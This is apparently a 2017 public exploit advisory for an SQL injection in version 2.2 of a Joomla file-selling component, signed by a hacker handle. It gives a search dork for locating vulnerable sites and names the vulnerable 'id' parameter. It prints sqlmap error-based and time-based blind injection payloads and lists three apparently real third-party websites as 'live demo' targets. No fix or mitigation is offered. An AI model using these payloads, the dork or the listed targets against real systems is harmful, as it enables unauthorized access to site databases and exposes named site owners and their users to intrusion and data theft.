##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Joomla com_joominaflileselling 2.2 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_joominaflileselling
# Vendor Homepage : http://www.joomina.ir by amirrezatehrani
# Link : https://goo.gl/uk4Cdj
# version : 2.2
# Tested on: [Parrot OS security]
# MyBlog : http://xbadgirl21.blogspot.com/
# Date: 10-02-2017
# video Proof : https://youtu.be/lDBVqeE_jlU
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
# [+] DESCRIPTION :
######################
# [+] JoominaFlileSelling Created on 12-Mar-2015 and it's
# [+] an component to help you easily to sell your files on your site in a secure manner
# [+] and it the most powerful plugin files at one time sale
# [+] AND an SQL injection has been Detected in this Joomla components joominaflileselling
######################
# [+] Poc :
######################
# [id] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/?option=com_joominaflileselling&view=joominafilesellpay&id=3
######################
# [+] SQLmap PoC:
######################
#Parameter: id (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: option=com_joominaflileselling&view=joominafilesellpay&id=3' AND (SELECT 2816 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (
# ELT(2816=2816,1))),0x7178707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BIhg'='BIhg
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: option=com_joominaflileselling&view=joominafilesellpay&id=3' AND SLEEP(5) AND 'xqDx'='xqDx
# ---
# GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
######################
# [!] Live Demo :
######################
# http://cgsample.com/?option=com_joominaflileselling&view=joominafilesellpay&id=3
# http://www.parsiweb24.ir/book/index.php?option=com_joominaflileselling&view=dargahpardakht&id=1
# http://azemun.ir/?option=com_joominaflileselling&view=joominafilesellpay&id=3
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################